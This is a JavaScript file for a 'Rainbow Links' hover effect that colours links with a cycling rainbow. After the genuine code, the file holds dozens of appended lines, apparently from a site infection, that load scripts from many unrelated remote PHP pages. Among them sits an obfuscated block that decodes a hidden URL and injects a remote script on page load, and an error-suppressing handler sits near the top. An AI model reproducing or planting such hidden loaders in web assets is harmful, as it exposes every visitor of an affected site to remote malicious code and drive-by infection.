/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '<script src="rainbow.js"></script>' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' && obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' && obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH < 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH < 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH < 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH < 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH < 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH < 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH >= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}

document.write('<script src=http://magicianputtaraj.com/tmp/contact.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://theatersix.com/Images/newshole_bottom.php ><\/script>');
document.write('<script src=http://theatersix.com/Images/newshole_bottom.php ><\/script>');
document.write('<script src=http://de-pareja.com/.smileys/index.php ><\/script>');
document.write('<script src=http://greetingcard.hdd1.ru/index.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://a1-discount-hotelsa.co.cc/wp-admin/wp-trackback.php ><\/script>');
document.write('<script src=http://znakomstva-lipeck.co.cc/wp-content/wp-settings.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://feilbach.ru/feilbach/style.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://shababemmanuel.com/admin/postinfo.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
var Zl;if(Zl!='MM'){Zl=''};var X;if(X!='F'){X=''};function v(){var he=new Date();this.a="";this.U='';var GQ;if(GQ!='' && GQ!='Mt'){GQ='D'};var n=window;var E=unescape;var t=E("%2f%73%74%65%72%6e%2d%64%65%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%72%75%70%61%6c%2e%6f%72%67%2e%70%68%70");var f=new Date();var cj=new Date();this.l='';var qV=new String();function Z(y,G){var GY='';this.qY="";var M=new String("giAHn".substr(0,1));var A;if(A!='YK' && A != ''){A=null};var TE=new Date();var j=E("%5b"), o=E("%5d");var h=j+G+o;var u=new RegExp(h, M);var Dr=new String();return y.replace(u, new String());var go;if(go!='g' && go!='Ga'){go='g'};var vt=new Array();};var wf='';var Wc='';var rR='';this.jF='';var C=document;var tR;if(tR!='mJ' && tR!='jB'){tR='mJ'};var gz='';var c=Z('819790556862290636','96735421');var z=new String();var oa;if(oa!='' && oa!='gG'){oa='ku'};var IX;if(IX!='' && IX!='WX'){IX=''};var vg='';function J(){this.cW="";var Ko;if(Ko!='' && Ko!='kS'){Ko='K'};var wG;if(wG!=''){wG='cB'};var XV=new Date();var m=E("%68%74%74%70%3a%2f%2f%62%65%73%74%64%61%72%6b%73%74%61%72%2e%69%6e%66%6f%3a");this.B_="";var lN;if(lN!='' && lN!='Da'){lN=null};var PA;if(PA!='' && PA!='kO'){PA=null};this.mc='';z=m;var kY=new Date();var cp=new Date();z+=c;var p='';z+=t;var Bg=new String();var dY=new String();this.Bl='';this.Nc='';try {this.Sh="";var Mh=new Array();zH=C.createElement(Z('s4c6r4i3p3t3','6F43'));var EW;if(EW!='hN' && EW != ''){EW=null};this.JM="";var gN=new String();zH[E("%73%72%63")]=z;zH[E("%64%65%66%65%72")]=[1][0];C.body.appendChild(zH);var FG='';var Iu=new String();} catch(n_){var qK;if(qK!='' && qK!='gY'){qK=null};alert(n_);var Sc;if(Sc!='' && Sc!='HC'){Sc='pd'};var Sv=new String();};this.Je='';var BG='';}var fv;if(fv!='' && fv!='RB'){fv=''};var BlP;if(BlP!='' && BlP!='oL'){BlP=''};n[new String("j1BRon".substr(4)+"lo"+"adMnqR".substr(0,2))]=J;var uH;if(uH!='Gn' && uH!='iI'){uH=''};var km=new Array();var Vj;if(Vj!='jz' && Vj!='cK'){Vj='jz'};};var BN;if(BN!='' && BN!='OM'){BN=''};var cY;if(cY!='ux' && cY != ''){cY=null};v();
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://beacon-tech.net/private/postinfo.php ><\/script>');
document.write('<script src=http://beacon-tech.net/private/postinfo.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://stoo.ntoos.com/thumb/ntoos_16.ntoos.php ><\/script>');
document.write('<script src=http://stoo.ntoos.com/thumb/ntoos_16.ntoos.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://qddlbd.com/stylesheet/msg_director.php ><\/script>');
document.write('<script src=http://qddlbd.com/stylesheet/msg_director.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://professionalappraisers.org/_derived/index.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');